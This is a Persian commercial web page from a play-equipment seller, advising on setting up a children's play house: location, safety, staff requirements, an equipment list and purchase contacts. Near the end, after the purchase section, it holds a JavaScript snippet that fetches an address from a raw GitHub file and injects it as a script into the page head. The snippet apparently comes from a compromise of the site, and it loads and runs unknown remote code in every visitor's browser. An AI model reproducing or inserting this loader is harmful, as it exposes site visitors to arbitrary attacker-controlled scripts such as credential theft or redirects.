درباره خانه بازی

  • نخستین گام قبل از آن که به تهیه وسایل خانه بازی فکر کنید، آن است که یک مکان مناسب برای مهد کودک در نظر بگیرید.

    اولین گام قبل از تهیه وسایل خانه بازی

    هنگام انتخاب مکان مناسب برای ساخت خانه ی بازی باید یک مکان بزرگ را نظر بگیرید. هر چه مکان مهد کودک بزرگ تر باشد فضای بیشتری برای بازی و شادی کودکان فراهم است. همچنین هر چه مکان بزرگ تر باشد شما می توانید از وسایل بازی بیشتر و متنوعی تری استفاده کنید. این امر سبب می شود بچه های بیشتری جذب خانه ی بازی شما شوند. مکان مورد نظر می بایست به صورت سرپوشیده و با توجه به استاندارد های وضع شده از جانب شهرداری باشد. حتی منطقه ای که برای ایجاد یک خانه ی بازی در نظر می گیرید باید حساب شده باشد. زیرا با توجه به قوانین در هر منطقه می توان تنها یکی از این جموعه احداث نمود.

    یکی از نکات مهم که در ساخت مهد کودک باید به آن توجه نمود ایمنی خانه بازی و وسایل خانه بازی است. وسایل خطرناک و یا تیز ممکن است موجب آسیب رساندن به کودکان شوند. در نتیجه می بایست از استفاده از چنین وسایلی خودداری شود. اگر در خانه بازی از پله ها استفاده می کنید بهتر است برای پله ها از حفاظ مطمئن بهره بگیرید. در ورودی خانه ی بازی باید کاملا اداری باشد.

    برای تاسیس مهد کودک به 4 کارمند اداری نیاز دارید:

    مدیر کل یا مدیر اصلی: مدیر کل مجموعه باید فردی ایرانی و تابع جمهوری اسلامی ایران باشد. او باید در بازه ی سنی 25 الی 65 سال قرار داشته باشد. همچنین وی باید سوءپیشینه‌ی کیفری و سابقه اعتیاد به مواد مخدر نداشته باشد. همچنین بهتر است او سابقه کار با کودکان و در محیط کودک را دارا باشد.

    مدیر داخلی: مدیر داخلی باید فردی کاملا مسلط به امور اداری و برنامه ریزی باشد. وی باید از تمامی قوانین محل کار خود آگاه باشد و بتواند کنترل امور را در دست بگیرد.

    کارمند جهت امور ثبت نام: کارمندی که امور ثبت نام کودکان را انجام می دهد و می بایست در اداره ی این امور تسلط کامل داشته باشد.

    مربیان آموزشی: مربیان آموزشی خانه کودک باید شرایط ویژه ای داشته باشد. او باید سنی زیر 30 سال داشته باشد تا بتواند با استفاده از نیروی جوانی خود و  با شور و اشتیاق چالش های کودکان را مدیریت کند. ظاهر مربیان خانه ی بازی نیز باید به گونه ای باشد تا والدین و کودکان بتوانند به وی اعتماد کنند.

    این مجموعه ها برای کودکان که آسیب پذیر ترین قشر جامعه هستند، خدمات ارائه می دهند. در نتیجه می بایست مطابق با فرهنگ و رسوم جامعه و اخلاقی اداره شوند تا کودکان از آسیب های احتمالی در امان باشند.

    معرفی انواع تجهیزات مهد کودک

    • برای خرید بهتر این تجهیزات باید به لیست تجهیزات مهد کودک که در مرکز تفریح سازان معرفی می‌شود، توجه کنید. هر یک از این خانه‌های بازی برای رنج سنی به خصوصی راه اندازی و تأسیس می‌شوند.
    • کیفیت تجهیزات به کار رفته در هر یک از این خانه‌های بازی به طور مستقیم بر کیفیت استفاده از این مراکز تأثیر می‌گذارد. برخی از مهم‌ترین تجهیزاتی که در این حوزه به کار برده می‌شوند به شرح زیر هستند:
    • 1- تاب و سرسره کودک
    • 2- چرخ و فلک
    • 3- الاکلنگ و تعادلی
    • 4- میز و صندلی کودک
    • 5- استند مشاغل کودک
    • 6- استخر توپ کودک
    • 7- استخرهای شن و ماسه بازی کودک
    • 8- چمن‌ها و کف‌پوش‌های مصنوعی مخصوص خانه‌های بازی کودک
    • 9- انواع وسایل بادی مثل سرسره بادی استخر توپ بادی و …

    نحوه خرید

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید انواع تجهیزات مهد کودک می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    برای اطلاعات بیشتر از این سرسره های بادی به این پست مراجعه کنید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید